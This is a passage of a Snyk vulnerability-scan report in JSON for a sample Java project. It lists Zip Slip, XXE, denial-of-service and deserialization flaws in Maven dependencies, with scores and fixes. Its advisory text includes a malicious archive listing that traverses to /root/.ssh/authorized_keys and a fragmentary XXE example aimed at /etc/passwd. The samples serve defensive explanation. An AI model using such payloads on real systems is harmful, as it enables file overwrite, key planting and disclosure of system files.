"NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 5.5, - "modificationTime": "2024-03-11T09:47:21.493786Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:19.847161Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:21.493786Z" - } - ], - "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", - "epssDetails": { - "percentile": "0.34705", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1002201" - ], - "CWE": [ - "CWE-29" - ] - }, - "packageName": "org.zeroturnaround:zt-zip", - "proprietary": true, - "creationTime": "2018-05-30T12:32:02.349000Z", - "functions_new": [ - { - "version": [ - "[,1.13)" - ], - "functionId": { - "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", - "functionName": "process" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-04-17T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.zeroturnaround", - "artifactId": "zt-zip" - }, - "publicationTime": "2018-05-31T07:32:02Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:21.493786Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.zeroturnaround:zt-zip@1.12" - ], - "upgradePath": [ - false, - "org.zeroturnaround:zt-zip@1.13" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.zeroturnaround:zt-zip", - "version": "1.12" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2" - } - ], - "ok": false, - "dependencyCount": 60, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "157 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" 